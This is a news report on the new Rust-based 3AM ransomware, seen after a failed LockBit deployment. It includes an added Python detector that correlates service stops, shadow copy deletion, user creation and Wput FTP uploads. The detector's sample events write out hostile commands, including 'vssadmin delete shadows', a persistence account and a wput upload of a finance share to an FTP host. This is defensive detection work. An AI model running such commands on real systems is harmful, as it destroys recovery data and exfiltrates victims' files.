A new ransomware family called 3AM has emerged in the wild after being detected in a single incident in which an unidentified affiliate deployed the strain following a failed attempt to deploy LockBit (aka Bitwise Spider or Hoverfly) in the target network.
“3AM is written in Rust and appears to be a completely new malware family,” the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News.
“The ransomware attempts to stop several services on the infected computer before starting to encrypt files. Once encryption is complete, it attempts to delete Volume Shadow (VSS) copies.”
3AM gets its name from a reference to it in the ransom note. It also appends the .troisamtime extension to encrypted files. That said, it is currently unclear whether the malware authors have any ties to known cybercrime groups.
In the attack spotted by Symantec, the adversary allegedly managed to deploy the ransomware on three machines on the organization’s network, only to be blocked on two of those machines.
The intrusion is distinguished by the use of Cobalt Strike for post-exploitation and privilege escalation, followed by the execution of reconnaissance commands to identify other servers for lateral movement. The exact entry route used in the attack is unclear.
“They also added a new user for persistence and used the Wput tool to exfiltrate victims’ files to their own FTP server,” Symantec noted.
A 64-bit executable written in Rust, 3AM is designed to execute a series of commands to stop various security and backup-related software, encrypt files matching predefined criteria, and purge volume shadow copies.
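As an added example (not code from Symantec or from the original article), the following Python detector correlates process-creation events per host and alerts when several of the behaviours described above (stopping services, deleting shadow copies, adding a user, uploading with Wput to FTP) occur within one time window. The command-line patterns are generic Windows idioms assumed for illustration, not commands taken from the report, and the window, threshold and sample events are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Generic command-line patterns for the behaviours listed above (assumed, not from the report).
BEHAVIOURS = {
    "service_stop": re.compile(r"\b(?:net1?|sc)(?:\.exe)?\s+stop\s", re.I),
    "shadow_delete": re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
    "user_add": re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+.*\s/add\b", re.I),
    "ftp_upload": re.compile(r"\bwput(?:\.exe)?\s.*ftp://", re.I),
}
WINDOW = timedelta(minutes=60)   # assumed correlation window
MIN_DISTINCT = 3                 # assumed alert threshold

def classify(cmdline):
    """Return the behaviour names whose pattern matches a command line."""
    return {name for name, rx in BEHAVIOURS.items() if rx.search(cmdline)}

def correlate(events):
    """events: iterable of (iso_timestamp, host, cmdline). Returns {host: behaviours}
    for hosts showing MIN_DISTINCT or more behaviours inside one WINDOW."""
    per_host = defaultdict(list)
    for ts, host, cmd in events:
        for name in classify(cmd):
            per_host[host].append((datetime.fromisoformat(ts), name))
    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            seen = {n for t, n in hits[i:] if t - start <= WINDOW}
            if len(seen) >= MIN_DISTINCT:
                alerts[host] = sorted(seen)
                break
    return alerts

# Constructed sample events (hosts, account names and the FTP address are made up).
SAMPLE = [
    ("2023-09-13T02:41:00", "SRV01", "net user helpdesk2 Constructed1! /add"),
    ("2023-09-13T02:55:10", "SRV01", "wput.exe D:\\share\\finance ftp://user:pw@192.0.2.10/"),
    ("2023-09-13T03:00:05", "SRV01", "net stop vss"),
    ("2023-09-13T03:00:06", "SRV01", "sc stop sql_agent"),
    ("2023-09-13T03:07:30", "SRV01", "vssadmin.exe delete shadows /all /quiet"),
    ("2023-09-13T09:12:00", "WS07", "net stop spooler"),   # routine admin action
    ("2023-09-13T14:30:00", "WS07", "net user alice /domain"),
]

if __name__ == "__main__":
    for host, seen in correlate(SAMPLE).items():
        print(f"{host}: {', '.join(seen)}")
```

Requiring several distinct behaviours on one host keeps single routine admin commands, such as the WS07 events, from alerting on their own.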
Although the exact origins of the ransomware remain unknown, there is evidence that the ransomware affiliate linked to the operation is targeting other entities, according to a post shared on Reddit on September 9, 2023.
“Ransomware affiliates have become increasingly independent from ransomware operators,” Symantec said.
“New ransomware families appear frequently and most disappear just as quickly or never gain traction. However, the fact that 3AM was used as a fallback by a LockBit affiliate suggests that it may be of interest to attackers and may be revisited in the future.”